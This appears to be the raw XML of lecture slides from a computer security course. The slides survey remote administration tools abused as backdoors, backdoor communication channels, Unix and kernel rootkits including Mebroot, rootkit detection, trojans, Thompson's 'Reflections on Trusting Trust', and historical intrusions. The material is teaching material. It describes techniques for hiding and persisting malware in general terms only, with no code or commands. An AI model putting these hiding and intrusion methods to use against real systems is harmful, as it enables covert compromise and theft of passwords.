              <a:pPr/>
              <a:t>31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3251" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6737350" y="3022600"/>
            <a:ext cx="19542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xfrm>
            <a:off x="429174" y="562845"/>
            <a:ext cx="8128000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Administration Tools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Legitimate tools are often abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Citrix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MetaFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinVNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, PC Anywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Complete remote control over the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easily found by port scan (e.g., port 1494 – Citrix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad installations, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>crackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> password authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“The Art of Intrusion” – hijacking remote admin tools to break into a cash transfer company, a bank’s IBM AS/400 server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Semi-legitimate tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Back Orifice, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NetBus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rootkit-like behavior: hide themselves, log keystrokes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Considered malicious by anti-virus software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53254" name="Picture 5" descr="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990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6" descr="netbu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02150"/>
            <a:ext cx="2743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2BB129C3-1B6F-4680-B5D5-5F9FBD91E7B6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32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609600"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Communicating Via Backdoors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SSH daemon on a high port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Communication encrypted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hard to recognize for network-based intrusion detector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hide SSH activity from the host by patching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May be possible to detect backdoors by observing their activity from a network-based intrusion detection system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UDP listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passively sniff the network for master’s commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All sorts of standard and non-standard tunnels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400780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DA75B4A-85B7-4E9E-AD6D-A2F2B4C44BFE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33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6340"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rootkits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hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is a set of trojan system binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Main characteristic: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>stealthiness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Hides infection from the host’s owner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Often includes a sniffer (to record users’ passwords)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Originally on Unix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Typical infection path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use stolen password or dictionary attack to log in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use a buffer overflow in a vulnerable local program to gain root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>rdist, sendmail, loadmodule, rpc.ypupdated, lpr, passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Download rootkit, unpack, compile, install</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26477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B82DF475-882D-42A1-B568-E863E280AE41}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34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0932"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hiding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rookit’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Presence on Unix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Create a hidden directory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/.lib,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/.poop and similar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often use invisible characters in directory name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(why?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Install hacked binaries for system programs such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, du, login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Modified binaries have same checksum as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>originals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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4644136" y="4419600"/>
            <a:ext cx="3530600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69194"/>
              <a:gd name="adj2" fmla="val -65343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Can’t detect attacker’s processes, files or network connections by running standard UNIX commands!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300334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02BD7631-CFC5-4072-BFD0-D04E4B4B130C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35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162"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real-Life Examples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dirty="0" smtClean="0"/>
              <a:t>Buffer overflow in BIND to get root on Lockheed Martin’s DNS server, install password sniffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sniffer logs stored in directory called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Excite@Home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> employees connect via dialup; attacker installs remote access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on their machines via open network shares, sniffs IP addresses of promising targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To bypass anti-virus scanners, use commercial remote-access software modified to make it invisible to user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1579013" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="2514600"/>
            <a:ext cx="685800" cy="5334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500231D-4795-499D-8E4D-F818A12B58F1}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36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45698" y="762000"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel Rootkits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dirty="0" smtClean="0"/>
              <a:t>Get loaded into kernel as an external module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, via compromised device driver or a badly implemented “digital rights” module (e.g., Sony XCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace addresses in system call table, interrupt descriptor table, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If kernel modules disabled, directly patch kernel memory through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kmem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SucKIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> rootkit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inject malicious code into a running process via PTRACE_ATTACH and PTRACE_DETACH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security software is often the first injection target!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35837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A1AD3379-2F80-4550-BBC6-169D2A6A3D90}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37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075" y="762000"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mebroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Windows)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029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Replaces the host’s Master Boot Record (MBR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>First physical sector of the hard drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Launches before Windows loads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>No registry changes, very little hooking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stores data in physical sectors, not files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Invisible through the normal OS interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Uses its own version of network driver API to send and receive packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Invisible to “personal firewall” in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Used in the Torpig botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403973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35640BA-0E30-4709-88AD-456FED4E7A92}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38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Detecting Rootkit’s Presence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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sad way to find out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Run out of physical disk space because of sniffer logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Logs are invisible because du and ls have been hacked!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Manual confirmation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reinstall clean ps and see what processes are running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Automatic detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rootkit does not alter the data structures normally used by netstat, ps, ls, du, ifconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Host-based intrusion detection can find rootkit files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…assuming an updated version of rootkit did not disable the intrusion detection system!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205790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62470099-EE64-4C8E-A5E3-FF31BB7D2466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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Trojans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solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trojan horse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is malicious code hidden in an apparently useful host program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>When the host program is executed, trojan does something harmful or unwanted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User must be tricked into executing the host program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>In 1995, a program distributed as PKZ300B.EXE looked like a new version of PKZIP… when executed, it formatted your hard drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Old-style trojans did not replicate, but today many are spread by virus- and worm-like mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3992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20FDB5C1-53C5-403A-B41F-FE7FA1D4BCA4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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916"/>
            <a:ext cx="8128000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Reflections on Trusting Trust”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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ken Thompson’s 1983 Turing Award lecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1295400" lvl="2" indent="-381000"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Linked from the course website (reference section)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Added a backdoor-opening Trojan to login program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Anyone looking at source code would see this, so changed the compiler to add backdoor at compile-time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Anyone looking at compiler source code would see this, so changed the compiler to recognize when it’s compiling a new compiler and to insert Trojan into it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>“The moral is obvious. You can’t trust code you did not totally create yourself. (Especially code from companies that employ people like me).”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37697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C28C04EE-0094-42A3-937D-C69467767201}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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85" y="792162"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example of a Trojan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smtClean="0"/>
              <a:t>Discover a helpdesk application on a Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Via misconfigured FrontPage, which allows arbitrary uploads and downloads from webroot directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Modify its input validation routine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Change the list of invalid characters to contain only spaces and ~</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use SQL injection to log in with admin privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hijack a dormant VPN account and log into the internal network via VPN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4176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194BD3C7-AD2D-4448-9AEF-0C30EB5D0515}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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92"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More Trojans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1987: Login program on NASA computers hacked by Chaos Computer Club, steals passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1999: Hacked login program at U. of Michigan steals 1534 passwords within 23 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2003: AOL employees tricked into accepting  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> via AIM, hackers get complete remote control over their machines via IRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also social engineering to steal passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2003: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Badtrans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> worm installs a keystroke-logging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, sends log to one of 22 email accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383652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72D6C958-43F0-4A57-9F7E-ACAD1897ACD2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Viruses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hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virus</a:t>
            </a:r>
            <a:r>
